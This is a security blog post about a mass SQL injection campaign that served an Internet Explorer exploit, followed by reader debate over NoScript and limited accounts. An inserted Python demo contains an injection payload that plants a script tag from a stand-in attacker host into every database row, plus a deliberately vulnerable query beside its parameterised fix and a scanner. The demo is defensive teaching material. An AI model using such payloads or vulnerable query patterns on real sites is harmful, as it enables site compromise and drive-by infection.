Thousands of legitimate sites SQL injected to serve IE exploit

Summary: Once again confirming the trend of more legitimate sites serving exploits and malware than purely malicious ones, Chinese hackers have been busy over the last couple of days launching massive SQL injection attacks affecting over 100,000 web sites.

The SQL injection attacks, which serve the just-patched Internet Explorer XML parsing exploit, are launched by several different Chinese hacking groups and, with a few exceptions, primarily target Asian countries. That is a logical choice given that the payload ultimately served is password-stealing malware for online games.

Which is the most targeted country?

According to stats from Symantec, China remains the most actively targeted country by the IE exploit, which is ironic given that it was Chinese researchers who leaked the exploit in the first place. Moreover, the 100,000 web sites Symantec cites as infected should be taken as a very conservative figure: more domains are being injected, and as in previous campaigns the number of affected sites can change quickly.

Consider the big picture for a moment. With or without a patch for the IE exploit, cybercrime conducted through the exploitation of already patched client-side vulnerabilities will continue to grow, as it has throughout 2008. Although old-fashioned compared to Russian cybercriminals, who would have folded the exploit into their web malware exploitation kits and served banker malware instead of password stealers, the Chinese attackers are clearly aware of this trend: all of the IE exploit-serving sites also serve several other exploits, targeting Adobe Flash, Acrobat Reader and RealPlayer for starters.

Recent studies continue to show that millions of users not only browse the web with insecure browsers, but are so focused on browser vulnerabilities that they ignore the rest of the software on their PCs as a potential infection vector, even though they are running insecure versions of it. Cybercriminals know this, and therefore bundle sets of exploits targeting every version of a given application known to be vulnerable, in order to raise the odds of a successful infection. This SQL injection attack is the most recent example of that mentality.

In 2008, cybercriminals continue to infect thousands of new hosts every day using 2007's critical vulnerabilities, because instead of patching vulnerable software the majority of end users remain comfortable in a false sense of security.
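The mechanics behind a campaign like this one are worth seeing in code. The following is an added example, not code from the article or from any of the attacked sites: it shows how a single string-concatenated UPDATE lets one request append a script inclusion to every row of a content table, why the same input stored through a parameterised query lands harmlessly in one field, and how to scan stored content for script or iframe tags that pull from a host other than the site's own (the external-host inclusion that one commenter below describes as the part an origin whitelist can block). The table layout, article text, site host and attacker host are all constructed for the demo.

```python
"""Added example (not from the article): mass SQL injection that appends a
script tag to every row, the parameterised query that prevents it, and a
scanner for third-party script/iframe inclusions left in stored content.
All hosts, table names and page text are constructed for this demo."""
import re
import sqlite3
from urllib.parse import urlparse

SITE_HOST = "www.example-news.test"          # hypothetical victim site
ATTACKER_HOST = "evil-exploit-server.test"   # hypothetical exploit server
INJECTED_TAG = f'<script src="http://{ATTACKER_HOST}/ie.js"></script>'

# Shape of a mass-injection value: close the quoted string, append a tag to a
# second column, widen the WHERE clause to every row, comment out the rest.
PAYLOAD = f"x', body = body || '{INJECTED_TAG}' WHERE 1=1 -- "


def make_db():
    """In-memory CMS table with a few constructed articles."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO articles (title, body) VALUES (?, ?)",
        [
            ("Front page", "<p>Welcome</p>"),
            ("Sports", "<p>Scores</p>"),
            # A first-party script include that a scanner must not flag.
            ("Weather", f'<p>Forecast</p><script src="http://{SITE_HOST}/widget.js"></script>'),
        ],
    )
    return conn


def set_title_vulnerable(conn, article_id, title):
    """String concatenation: the submitted text becomes part of the SQL."""
    conn.execute(f"UPDATE articles SET title = '{title}' WHERE id = {article_id}")
    conn.commit()


def set_title_safe(conn, article_id, title):
    """Parameterised query: the same text is stored as data in one row only."""
    conn.execute("UPDATE articles SET title = ? WHERE id = ?", (title, article_id))
    conn.commit()


# Matches the src attribute of <script ...> and <iframe ...> tags, quoted or not.
_SRC_RE = re.compile(r"<(?:script|iframe)\b[^>]*?\bsrc\s*=\s*['\"]?([^'\" >]+)", re.I)


def third_party_inclusions(html, site_host=SITE_HOST):
    """Hosts referenced by script/iframe src attributes other than the site's own."""
    hosts = set()
    for src in _SRC_RE.findall(html):
        host = urlparse(src).hostname
        if host and host.lower() != site_host.lower():
            hosts.add(host.lower())
    return hosts


def infected_article_ids(conn):
    """Ids of rows whose body pulls script/iframe content from a foreign host."""
    rows = conn.execute("SELECT id, body FROM articles ORDER BY id").fetchall()
    return [row_id for row_id, body in rows if third_party_inclusions(body)]


def run_demo():
    vuln = make_db()
    set_title_vulnerable(vuln, 1, PAYLOAD)   # one request poisons every row
    safe = make_db()
    set_title_safe(safe, 1, PAYLOAD)         # payload stored literally in one title
    poisoned_body = vuln.execute("SELECT body FROM articles WHERE id = 1").fetchone()[0]
    return {
        "vulnerable_infected": infected_article_ids(vuln),
        "safe_infected": infected_article_ids(safe),
        "safe_title_row1": safe.execute("SELECT title FROM articles WHERE id = 1").fetchone()[0],
        "foreign_hosts": third_party_inclusions(poisoned_body),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

The scanner is deliberately simple: it only asks whether a tag's src host differs from the site's own, which is exactly the property a script whitelist keyed on origin relies on. A real sweep over a database dump or crawled pages would also want to catch obfuscated tags and document.write-style loaders, but the host check alone already separates the injected rows from the row carrying a legitimate first-party widget.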

Dancho Danchev

About Dancho Danchev

Dancho Danchev is an independent security consultant and cyber threats analyst, with extensive experience in open source intelligence gathering, malware and cybercrime incident response.

  • This is why Firefox + NoScript isn't a magic fix

    Before any Firefox zealots start going nuts, Firefox + NoScript is my browser configuration of choice.

    That being said, people do have to be careful when they use the "Allow <site>" option of NoScript because even legitimate, trustworthy sites are sometimes used to distribute malware. I really and truly wish that Mozilla would implement a Protected Mode for FireFox under Vista.
    • Not magic, but more effective than you think

      Even if the compromised site is in your whitelist, allowed to run JavaScript, the actual attack is thrown by a tiny IFrame or a script inclusion which just pulls the malicious code from an external server in control of the attacker (usually in a Chinese or Russian domain registered for this purpose) and surely not in your whitelist. This is quite reasonable: since SQL vulnerabilities are not suitable for injecting large chunks of malicious code, and such an attack cannot write Flash applets or JavaScript files on the filesystem of the compromised server, the attacker needs to download them from somewhere else.
      Therefore NoScript's fine-grained script blocking prevents them from being loaded and effectively defeats the attack.
      Giorgio Maone
      • Excellent info

        Thanks for that info, much appreciated.
      • How is this different than IE's whitelist for scripts? (nt)

        • Er, you are still vulnerable in IE7

          You cannot disable iframes
          • What?

            So why is there a setting for it in the Security tab in Internet Options?
          • You cannot disable iframes

            You can disable programs from loading from within iframes, but you cannot disable iframes in IE7. Try visiting a page containing iframes with your iframe option disabled and check for yourself. For a fully patched IE, the option to disable programs from within iframes is enough, but for a known unpatched vulnerability, with drive-by downloads, the restriction may possibly be overcome.
      • No Script Still no magic bullet

        You don't need a script to download a malicious file. So even if it is not in the "NoScript" whitelist you will have malware on your system.
        • You're Making Wrong Assumptions :)

          You're assuming you just need to download an exe to get the malware. You need to download and execute it, instead. Firefox never allows an executable to be launched by the browser upon download. To do that, an attacker needs to exploit some vulnerability, and this almost always involves some non-trivial JavaScript and/or plugin magic, which is actually blocked by NoScript.
          Giorgio Maone
          • My experience with it..

            I have several bad-site blockers installed in IE 7, which block the server redirects; also ActiveX registry settings (SpywareBlaster). Spybot's Immunizer disables a lot of crack controls present on web pages, and the TeaTimer prevents some of them from making registry changes in the first place.

            Comodo Firewall Pro prevents the modification of files in some instances, and blocks the outgoing server requests in others.

            I still get hit once in a while when these attacks pop out of page ads, but since I keep my Java and Adobe Reader/Flash updated my AV (ESET) is easily able to thwart the attack.

            It seems most of these vectors take advantage of one vulnerability or another in applications; if they are updated this may not happen most of the time. A blended defense can mitigate it. My clients refuse to do without web functionality and I refuse to knuckle under to the criminals.

            I will continue to operate with iframes, ActiveX, and Java enabled for the near future. I'm not saying I'm invulnerable, but I have won the day on every attack so far.

            Running in restricted Windows rights goes a LONG way toward prevention.
          • You are Right. However...

            While you are right, the hole in IE allows execution of any command w/o user intervention. While it is being automatically spread using scripts it is really an XML CDATA binding error that will execute ANYTHING you tell it to once the stack has been corrupted.

            This is specifically an IE thing. Even if the script (which is just an automated implementation of the CDATA bind) were to run in FF it would have no effect because the FF stack does not get corrupted by the malformed XML.
        • If you wanted to

          You could of course make the purposeful choice to download and run a file.

          See, these things called exploits, they don't give you that choice. They force it on you, and that's the whole problem. ;)
      • To the point

        Thank you for being direct and to the point instead of the babble.

        Great info
    • Does Bill Gates know you use Firefox? [nt]

    • NoScript in FF == security level:high in IE?

      How is using NoScript in FF different from setting the security level to "high" in IE?

      Besides, the real problem is not that you or I can change the settings or add a plugin; the real problem is that there are so many users that don't have any clue and don't patch their systems, which is pretty much a no-brainer in itself on Windows, with automatic updates.
      • NoScript is much better

        Disclaimer: I'm NoScript's author

        1. NoScript allows you to whitelist a site with one click, while Microsoft's zones are very painful to use
        2. NoScript's whitelist is guarded by the best anti-XSS filters currently available on the client side, while IE7 has nothing like that and IE8 has a limited copycat** of NoScript's.
        3. NoScript offers many other unique security enhancements which go far beyond "security level:high", e.g. anti-Clickjacking protection, see

        Giorgio Maone
        • No addon or security suite is better than

          Running with least privilege as a standard (limited) user. NoScript is awesome and I use it as an added layer of protection, but it is no substitute for a properly configured user account.
          • Limited Accounts (and sandboxes) are Overrated

            Sure I'm a big fan of least privilege, and if you're using an "administrator" or "root" account to browse the web you're inviting full system infection.
            On the other hand, even if you use a limited account (and, let me repeat, you really should), you can as easily be the victim of an effective attack: accessing your personal data, stealing your sensitive documents, turning your PC into a spam bot (you can send email from your limited account, can't you?) and so on. Basically anything your "limited" account can do, an attacker is enabled to do as well. The main difference from a root/administrator attack is that your wife's account is still OK and you'll have an easier time cleaning up your PC when you realize you've been owned.
            Even "protected mode" and sandboxes are overrated: if you think about it, there are a lot of malicious things an attacker in your browser can do without accessing your local filesystem, now that we're moving more and more vital data (bank accounts, email, social relationships...) into the "cloud"*. Your local resources will become even less valuable in the future, if this trend is confirmed.
            So, the best approach is layered, and the first, most important and most effective layer is always don't allow any untrusted code to run.

            Giorgio Maone
          • Not once has

            anyone brought a computer to me to be cleaned of malware that used a limited user account. All the systems I have cleaned were run wide open, including some that used Firefox and NoScript. Besides, the point of my last post was that layered security starts at least privilege. Unless your security model starts with a firm foundation (least privilege), all your other defenses are of little use, including NoScript. So no, running with least privilege is not overrated.

            (I did say that I used NoScript as an added layer of protection in the other post. I was in no way implying that people should avoid NoScript and was pretty clear about it in my previous post.)
          • Giorgio is right...

            Especially if you have any application with a vulnerability that allows the script to take control of your computer with newly won administrative rights. Secunia PSI 1.0 goes a long way in preventing this by helping you keep your applications, add-ons, etc. up to date.

            It even finds end-of-life or individual .exe files left over from previous uninstalls that could compromise your computer even in restricted mode.

            I've seen these web pests in action when they try to gain administrative access using, say, Adobe Reader for PDFs. If the application is not updated before the attack, the bug can take control very rapidly and even subvert some good antivirus software that has the definition in its update files.

            Some scripts are even "Sandboxie"-aware and can usually break out into the session using several subversion techniques. But it would still be wise to use it on the admin side, if only for one more stumbling block for the crackers.